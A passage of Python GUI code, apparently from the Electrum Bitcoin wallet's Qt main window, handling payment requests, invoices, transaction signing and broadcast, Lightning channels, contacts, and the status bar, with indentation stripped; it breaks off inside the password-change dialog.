def create_invoice(self, is_lightning):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
if is_lightning:
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
if not key:
return
self.address_list.update()
assert key is not None
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
# copy to clipboard
r = self.wallet.get_request(key)
content = r.invoice if r.is_lightning() else r.get_address()
title = _('Invoice') if is_lightning else _('Address')
self.do_copy(content, title=title)
def create_bitcoin_request(self, amount, message, expiration) -> Optional[str]:
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic(): # imported wallet
msg = [
_('No more addresses in your wallet.'), ' ',
_('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ',
_('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n',
_('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'),
]
if not self.question(''.join(msg)):
return
addr = self.wallet.get_receiving_address()
else: # deterministic wallet
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, content: str, *, title: str = None) -> None:
self.app.clipboard().setText(content)
if title is None:
tooltip_text = _("Text copied to clipboard").format(title)
else:
tooltip_text = _("{} copied to clipboard").format(title)
QToolTip.showText(QCursor.pos(), tooltip_text, self)
def clear_receive_tab(self):
self.receive_payreq_e.setText('')
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.clearSelection()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def update_receive_qr(self):
uri = str(self.receive_payreq_e.text())
if maybe_extract_bolt11_invoice(uri):
# encode lightning invoices as uppercase so QR encoding can use
# alphanumeric mode; resulting in smaller QR codes
uri = uri.upper()
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = FreezableLineEdit()
self.message_e.setMinimumWidth(700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.send_button = EnterButton(_("Pay") + "...", self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
self.set_onchain(False)
self.invoices_label = QLabel(_('Outgoing payments'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
outputs = self.payto_e.get_outputs(True)
if not outputs:
return
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=self.get_coins(),
outputs=outputs,
fee=fee_est,
is_sweep=False)
try:
tx = make_tx(None)
except (NotEnoughFunds, NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs) as e:
self.max_button.setChecked(False)
self.show_error(str(e))
return
self.max_button.setChecked(True)
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
@protected
def protect(self, func, args, password):
return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.scriptpubkey is None:
self.show_error(_('Bitcoin Address is None'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
if len(errors) == 1 and not errors[0].is_multiline:
err = errors[0]
self.show_warning(_("Failed to parse 'Pay to' line") + ":\n" +
f"{err.line_content[:40]}...\n\n"
f"{err.exc!r}")
else:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") +
f"{err.idx+1}: {err.line_content[:40]}... ({err.exc!r})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def pay_lightning_invoice(self, invoice: str, *, amount_msat: Optional[int]):
if amount_msat is None:
raise Exception("missing amount for LN invoice")
amount_sat = Decimal(amount_msat) / 1000
# FIXME this is currently lying to user as we truncate to satoshis
msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.format_amount_and_units(amount_sat))
if not self.question(msg):
return
attempts = LN_NUM_PAYMENT_ATTEMPTS
def task():
self.wallet.lnworker.pay(invoice, amount_msat=amount_msat, attempts=attempts)
self.do_clear()
self.wallet.thread.add(task)
self.invoice_list.update()
def on_request_status(self, wallet, key, status):
if wallet != self.wallet:
return
if key not in self.wallet.receive_requests:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
self.need_update.set()
def on_invoice_status(self, wallet, key):
if wallet != self.wallet:
return
req = self.wallet.get_invoice(key)
if req is None:
return
self.invoice_list.update_item(key, req)
def on_payment_succeeded(self, wallet, key):
description = self.wallet.get_label(key)
self.notify(_('Payment succeeded') + '\n\n' + description)
self.need_update.set()
def on_payment_failed(self, wallet, key, reason):
self.show_error(_('Payment failed') + '\n\n' + reason)
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
if not self._is_onchain:
invoice_str = self.payto_e.lightning_invoice
if not invoice_str:
return
if not self.wallet.has_lightning():
self.show_error(_('Lightning is disabled'))
return
invoice = LNInvoice.from_bech32(invoice_str)
if invoice.get_amount_msat() is None:
amount_sat = self.amount_e.get_amount()
if amount_sat:
invoice.amount_msat = int(amount_sat * 1000)
else:
self.show_error(_('No amount'))
return
return invoice
else:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.payto_URI)
def do_save_invoice(self):
invoice = self.read_invoice()
if not invoice:
return
self.wallet.save_invoice(invoice)
self.do_clear()
self.invoice_list.update()
def do_pay(self):
invoice = self.read_invoice()
if not invoice:
return
self.wallet.save_invoice(invoice)
self.invoice_list.update()
self.do_clear()
self.do_pay_invoice(invoice)
def pay_multiple_invoices(self, invoices):
outputs = []
for invoice in invoices:
outputs += invoice.outputs
self.pay_onchain_dialog(self.get_coins(), outputs)
def do_pay_invoice(self, invoice: 'Invoice'):
if invoice.type == PR_TYPE_LN:
assert isinstance(invoice, LNInvoice)
self.pay_lightning_invoice(invoice.invoice, amount_msat=invoice.get_amount_msat())
elif invoice.type == PR_TYPE_ONCHAIN:
assert isinstance(invoice, OnchainInvoice)
self.pay_onchain_dialog(self.get_coins(), invoice.outputs)
else:
raise Exception('unknown invoice type')
def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]:
coins = self.get_manually_selected_coins()
if coins is not None:
return coins
else:
return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only)
def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]:
"""Return a list of selected coins or None.
Note: None means selection is not being used,
while an empty sequence means the user specifically selected that.
"""
return self.utxo_list.get_spend_list()
def pay_onchain_dialog(self, inputs: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], *,
external_keypairs=None) -> None:
# trustedcoin requires this
if run_hook('abort_send', self):
return
is_sweep = bool(external_keypairs)
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=inputs,
outputs=outputs,
fee=fee_est,
is_sweep=is_sweep)
output_values = [x.value for x in outputs]
if output_values.count('!') > 1:
self.show_error(_("More than one output set to spend max"))
return
output_value = '!' if '!' in output_values else sum(output_values)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep)
if d.not_enough_funds:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
if not d.have_enough_funds_assuming_zero_fees():
self.show_message(_('Not Enough Funds'))
return
# shortcut to advanced preview (after "enough funds" check!)
if self.config.get('advanced_preview'):
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs)
return
cancelled, is_send, password, tx = d.run()
if cancelled:
return
if is_send:
def sign_done(success):
if success:
self.broadcast_or_show(tx)
self.sign_tx_with_password(tx, callback=sign_done, password=password,
external_keypairs=external_keypairs)
else:
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs)
def preview_tx_dialog(self, *, make_tx, external_keypairs=None):
d = PreviewTxDialog(make_tx=make_tx, external_keypairs=external_keypairs,
window=self)
d.show()
def broadcast_or_show(self, tx: Transaction):
if not tx.is_complete():
self.show_transaction(tx)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
self.show_transaction(tx)
return
self.broadcast_transaction(tx)
@protected
def sign_tx(self, tx, *, callback, external_keypairs, password):
self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs)
def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if external_keypairs:
# can sign directly
task = partial(tx.sign, external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx: Transaction):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Invoice has expired")
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
return False, e.get_message_for_gui()
except BestEffortRequestFailed as e:
return False, repr(e)
# success
txid = tx.txid()
if pr:
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return True, txid
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
success, msg = result
if success:
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def mktx_for_open_channel(self, funding_sat):
coins = self.get_coins(nonlocal_only=True)
make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel(coins=coins,
funding_sat=funding_sat,
fee_est=fee_est)
return make_tx
def open_channel(self, connect_str, funding_sat, push_amt):
try:
extract_nodeid(connect_str)
except ConnStringFormatError as e:
self.main_window.show_error(str(e))
return
# use ConfirmTxDialog
# we need to know the fee before we broadcast, because the txid is required
make_tx = self.mktx_for_open_channel(funding_sat)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False)
# disable preview button because the user must not broadcast tx before establishment_flow
d.preview_button.setEnabled(False)
cancelled, is_send, password, funding_tx = d.run()
if not is_send:
return
if cancelled:
return
# read funding_sat from tx; converts '!' to int value
funding_sat = funding_tx.output_value_for_address(ln_dummy_address())
def task():
return self.wallet.lnworker.open_channel(connect_str=connect_str,
funding_tx=funding_tx,
funding_sat=funding_sat,
push_amt_sat=push_amt,
password=password)
def on_success(args):
chan, funding_tx = args
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
if not funding_tx.is_complete():
message += '\n\n' + _('Please sign and broadcast the funding transaction')
self.show_message(message)
if not funding_tx.is_complete():
self.show_transaction(funding_tx)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(repr(e)))
WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b: bool) -> None:
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoices(self, keys):
for key in keys:
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setAmount(pr.get_amount())
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request: 'paymentrequest.PaymentRequest'):
self.set_onchain(True)
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def parse_lightning_invoice(self, invoice):
"""Parse ln invoice, and prepare the send tab for it."""
try:
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
raise LnDecodeException(e) from e
pubkey = bh2u(lnaddr.pubkey.serialize())
for k,v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.message_e.setText(description)
if lnaddr.get_amount_sat() is not None:
self.amount_e.setAmount(lnaddr.get_amount_sat())
#self.amount_e.textEdited.emit("")
self.set_onchain(False)
def set_onchain(self, b):
self._is_onchain = b
self.max_button.setEnabled(b)
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e]:
e.setText('')
e.setFrozen(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = UTXOList(self)
return self.create_list_tab(self.utxo_list)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if not self.question(_("Do you want to remove {} from your wallet?").format(addr)):
return
try:
self.wallet.delete_address(addr)
except UserFacingException as e:
self.show_error(str(e))
else:
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_onchain_invoice(self, invoice: OnchainInvoice):
amount_str = self.format_amount(invoice.amount_sat) + ' ' + self.base_unit()
d = WindowModalDialog(self, _("Onchain Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
grid.addWidget(QLabel(amount_str), 1, 1)
if len(invoice.outputs) == 1:
grid.addWidget(QLabel(_("Address") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.get_address()), 2, 1)
else:
outputs_str = '\n'.join(map(lambda x: x.address + ' : ' + self.format_amount(x.value)+ self.base_unit(), invoice.outputs))
grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0)
grid.addWidget(QLabel(outputs_str), 2, 1)
grid.addWidget(QLabel(_("Description") + ':'), 3, 0)
grid.addWidget(QLabel(invoice.message), 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1)
if invoice.bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70))
pr.verify(self.contacts)
grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0)
grid.addWidget(QLabel(pr.get_requestor()), 5, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 6, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 6, 1)
def do_export():
key = pr.get_id()
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('BIP70 invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Export'), do_export)
buttons = Buttons(exportButton, CloseButton(d))
else:
buttons = Buttons(CloseButton(d))
vbox.addLayout(grid)
vbox.addLayout(buttons)
d.exec_()
def show_lightning_invoice(self, invoice: LNInvoice):
lnaddr = lndecode(invoice.invoice, expected_hrp=constants.net.SEGWIT_HRP)
d = WindowModalDialog(self, _("Lightning Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0)
grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
amount_str = self.format_amount(invoice.get_amount_sat()) + ' ' + self.base_unit()
grid.addWidget(QLabel(amount_str), 1, 1)
grid.addWidget(QLabel(_("Description") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.message), 2, 1)
grid.addWidget(QLabel(_("Hash") + ':'), 3, 0)
grid.addWidget(QLabel(lnaddr.paymenthash.hex()), 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1)
vbox.addLayout(grid)
invoice_e = ShowQRTextEdit()
invoice_e.addCopyButton(self.app)
invoice_e.setText(invoice.invoice)
vbox.addWidget(invoice_e)
vbox.addLayout(Buttons(CloseButton(d),))
d.exec_()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.db.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
'lnutil': lnutil,
})
c = commands.Commands(config=self.config,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.lightning_button = None
if self.wallet.has_lightning() and self.network:
self.lightning_button = StatusBarButton(read_QIcon("lightning_disconnected.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
self.update_lightning_icon()
sb.addPermanentWidget(self.lightning_button)
self.status_button = None
if self.network:
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog)
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def create_coincontrol_statusbar(self):
self.coincontrol_sb = sb = QStatusBar()
sb.setSizeGripEnabled(False)
#sb.setFixedHeight(3 * char_width_in_lineedit())
sb.setStyleSheet('QStatusBar::item {border: None;} '
+ ColorScheme.GREEN.as_stylesheet(True))
self.coincontrol_label = QLabel()
self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
sb.addWidget(self.coincontrol_label)
clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None))
clear_cc_button.setStyleSheet("margin-right: 5px;")
sb.addPermanentWidget(clear_cc_button)
sb.setVisible(False)
return sb
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
if not msg:
self.coincontrol_label.setText("")
self.coincontrol_sb.setVisible(False)
return
self.coincontrol_label.setText(msg)
self.coincontrol_sb.setVisible(True)
def update_lightning_icon(self):
if self.lightning_button is None:
return
if self.network.lngossip is None:
return
# display colorful lightning icon to signal connection
self.lightning_button.setIcon(read_QIcon("lightning.png"))
cur, total, progress_percent = self.network.lngossip.get_sync_progress_estimate()
# self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}")
progress_str = "??%"
if progress_percent is not None:
progress_str = f"{progress_percent}%"
if progress_percent and progress_percent >= 100:
self.lightning_button.setMaximumWidth(25)
self.lightning_button.setText('')
self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced."))
else:
self.lightning_button.setMaximumWidth(25 + 4 * char_width_in_lineedit())
self.lightning_button.setText(progress_str)
self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n"
"Payments are more likely to succeed with a more complete graph."))
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
def change_password_dialog(self):
from electrum.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
